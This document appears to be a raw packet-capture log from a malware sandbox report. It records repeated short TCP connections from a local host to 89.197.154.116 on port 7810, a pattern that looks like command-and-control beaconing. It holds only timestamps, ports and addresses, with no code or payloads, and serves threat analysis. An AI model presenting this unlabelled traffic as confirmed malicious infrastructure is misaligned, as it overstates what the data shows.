                                          Oct 13, 2024 01:58:11.538079977 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.785156965 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.785201073 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.785233974 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.785463095 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.785752058 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.785752058 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.790747881 CEST78104973589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.790941954 CEST497357810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.891109943 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.896761894 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:11.897089005 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.897403955 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:11.902420044 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.724518061 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.724597931 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.724699020 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.724739075 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.724754095 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.724792957 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.727179050 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.728600025 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.732079983 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.733441114 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.981595039 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.981847048 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.981868982 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.981911898 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.981935978 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.981935978 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.982307911 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.982307911 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:12.987328053 CEST78104973689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:12.987545013 CEST497367810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.094657898 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.242726088 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.242842913 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.243241072 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.248078108 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.852277040 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.852516890 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.982912064 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.983021975 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.990137100 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.991647005 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:13.995135069 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:13.996643066 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.240271091 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.240312099 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.240344048 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.240365982 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.240442991 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.240442991 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.241137981 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.241167068 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.246025085 CEST78104973789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.246099949 CEST497377810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.345732927 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.350956917 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.351281881 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.351691008 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:14.356817007 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.951570988 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:14.951901913 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.080398083 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.080761909 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.081281900 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.082828999 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.086456060 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.087824106 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.328530073 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.328574896 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.328608036 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.328933954 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.328933954 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.328933954 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.329420090 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.329421043 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.334669113 CEST78104973889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.335020065 CEST497387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.438261032 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.443716049 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:15.443929911 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.444308043 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:15.449482918 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.065859079 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.066066027 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.200870991 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.201077938 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.201731920 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.203373909 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.207124949 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.208276987 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.456257105 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.456341028 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.456439018 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.456473112 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.456502914 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.456538916 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.457076073 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.457109928 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.461936951 CEST78104973989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.461998940 CEST497397810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.564461946 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.569390059 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:16.569510937 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.569976091 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:16.574906111 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.180205107 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.180336952 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.314620972 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.314702988 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.315336943 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.316397905 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.320163012 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.321223021 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.567353010 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.567426920 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.567449093 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.567464113 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.567492008 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.567516088 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.567831993 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.567871094 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.572643995 CEST78104974089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.572717905 CEST497407810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.673121929 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.678159952 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:17.678242922 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.678565979 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:17.683475971 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.280097961 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.280189991 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.412904024 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.412981033 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.413424969 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.414839029 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.418354988 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.419728994 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.709443092 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.709482908 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.709511042 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.709530115 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.709583044 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.709583044 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.709815025 CEST497417810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.714700937 CEST78104974189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.813096046 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.817934990 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:18.818025112 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.818285942 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:18.823215008 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.430721045 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.431025982 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.562753916 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.562997103 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.563410997 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.568224907 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.630882978 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.635725975 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.819025993 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.819295883 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.819401979 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.819446087 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.819535971 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.839756012 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.839756012 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.845352888 CEST78104974489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.845587015 CEST497447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.953625917 CEST497477810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.959090948 CEST78104974789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:19.959244013 CEST497477810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.959532976 CEST497477810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:19.964701891 CEST78104974789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:20.556633949 CEST78104974789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:20.556703091 CEST497477810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:20.688112020 CEST78104974789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:20.688199997 CEST497477810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:20.688503027 CEST497477810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:20.693501949 CEST78104974789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:20.694873095 CEST497477810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:20.699975967 CEST78104974789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:20.936227083 CEST78104974789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:20.936270952 CEST78104974789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:58:20.936306000 CEST497477810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:58:20.936331034 CEST497477810192.168.2.489.197.154.116
Oct 13, 2024 01:58:20.936333895 CEST  7810   49747  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:20.936393023 CEST  49747  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:20.936669111 CEST  49747  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:20.936691046 CEST  49747  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:20.942056894 CEST  7810   49747  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:20.942320108 CEST  49747  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:21.047513962 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:21.052871943 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:21.053205967 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:21.053472996 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:21.058571100 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:21.683450937 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:21.683706045 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:21.822699070 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:21.823981047 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:21.824314117 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:21.829590082 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:21.869314909 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:21.874726057 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.077687025 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.077740908 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.077977896 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.079113007 CEST  49749  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.084203959 CEST  7810   49749  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.190651894 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.195544004 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.195628881 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.195982933 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.200776100 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.797190905 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.797262907 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.929055929 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.931869984 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.933151007 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.938389063 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:22.939455986 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:22.944720030 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:23.202302933 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:23.202357054 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:23.202389002 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:23.202636957 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:23.202991962 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:23.202991962 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:23.208137989 CEST  7810   49751  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:23.208317041 CEST  49751  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:23.313251972 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:23.318416119 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:23.318653107 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:23.318840027 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:23.323729992 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:23.920593977 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:23.921058893 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.052711964 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:24.052877903 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.053426981 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.054615974 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.058212042 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:24.059441090 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:24.304608107 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:24.304630041 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:24.305059910 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.305397034 CEST  49752  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.310622931 CEST  7810   49752  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:24.406833887 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.411948919 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:24.417860985 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.418157101 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:24.423105955 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.017294884 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.017441034 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.152854919 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.153158903 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.153536081 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.154722929 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.158757925 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.159559965 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.401722908 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.401808023 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.401885033 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.401937008 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.401947021 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.401997089 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.402282953 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.402364969 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.407165051 CEST  7810   49753  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.407244921 CEST  49753  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.516115904 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.520972013 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:25.521063089 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.521338940 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:25.526145935 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.119631052 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.119867086 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.248370886 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.248533964 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.248960018 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.250478983 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.253885984 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.255420923 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.496109009 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.496159077 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.496372938 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.496373892 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.496798992 CEST  49754  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.501975060 CEST  7810   49754  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.610198021 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.615890980 CEST  7810   49755  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:26.616264105 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.616394997 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:26.621726990 CEST  7810   49755  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:27.219238043 CEST  7810   49755  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:27.219444036 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.349059105 CEST  7810   49755  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:27.349437952 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.349663973 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.350749016 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.354723930 CEST  7810   49755  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:27.356023073 CEST  7810   49755  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:27.599510908 CEST  7810   49755  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:27.599608898 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.599833965 CEST  7810   49755  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:27.599977016 CEST  49755  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.703751087 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.709028006 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:27.709399939 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.709501028 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:27.714854002 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.332508087 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.332875013 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.468877077 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.469118118 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.469866037 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.471175909 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.474895000 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.476186991 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.724164009 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.724308014 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.724490881 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.724571943 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.724653006 CEST  49756  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.729844093 CEST  7810   49756  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.828710079 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.834151983 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:28.834237099 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.834506035 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:28.839610100 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.444050074 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.444175959 CEST  49757  7810   192.168.2.4     89.197.154.116
Oct 13, 2024 01:58:29.577110052 CEST  7810   49757  89.197.154.116  192.168.2.4
Oct 13, 2024 01:58:29.577183962 CEST  49757  7810   192.168.2.4     89.197.154.116
